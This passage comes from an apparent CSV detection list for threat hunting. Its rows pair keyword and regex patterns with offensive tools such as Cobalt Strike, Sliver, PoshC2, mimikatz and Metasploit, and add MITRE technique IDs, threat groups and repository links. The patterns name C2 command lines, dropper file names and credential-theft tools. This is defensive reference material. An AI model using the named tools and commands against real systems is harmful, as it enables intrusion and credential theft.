Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.sln*",".{0,1000}PortBender\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.zip*",".{0,1000}PortBender\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portfwd add ?l *-p *-r *",".{0,1000}portfwd\sadd\s\?l\s.{0,1000}\-p\s.{0,1000}\-r\s.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A" "*portfwd add --bind *",".{0,1000}portfwd\sadd\s\-\-bind\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*portfwd add -r *",".{0,1000}portfwd\sadd\s\-r\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Port-Scan.ps1*",".{0,1000}Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*portscan.rc*",".{0,1000}portscan\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*portscan_result.cna*",".{0,1000}portscan_result\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*portscan386 *",".{0,1000}portscan386\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*portscan64 *",".{0,1000}portscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*PortScan-Alive*",".{0,1000}PortScan\-Alive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework 
created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portscanner.js*",".{0,1000}portscanner\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*portscanner.py*",".{0,1000}portscanner\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Portscan-Port*",".{0,1000}Portscan\-Port.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - 
T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PortSwigger/http-request-smuggler*",".{0,1000}PortSwigger\/http\-request\-smuggler.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*posh_in_mem*",".{0,1000}posh_in_mem.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*posh_stageless.py*",".{0,1000}posh_stageless\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Posh_v4_dropper_*",".{0,1000}Posh_v4_dropper_.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Posh_v4_x64_*.bin*",".{0,1000}Posh_v4_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Posh_v4_x86_*.bin*",".{0,1000}Posh_v4_x86_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*PoshC2-*.zip*",".{0,1000}PoshC2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2.server*",".{0,1000}poshc2\.server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - 
T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2.service*",".{0,1000}poshc2\.service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshc2-ansible-main.yml*",".{0,1000}poshc2\-ansible\-main\.yml.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-cookie-decryptor*",".{0,1000}posh\-cookie\-decryptor.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-delete *",".{0,1000}posh\-delete\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*poshkatz.psd1*",".{0,1000}poshkatz\.psd1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" "*posh-project *",".{0,1000}posh\-project\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-project -*",".{0,1000}posh\-project\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. 
allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. 
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*posh-update *",".{0,1000}posh\-update\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral 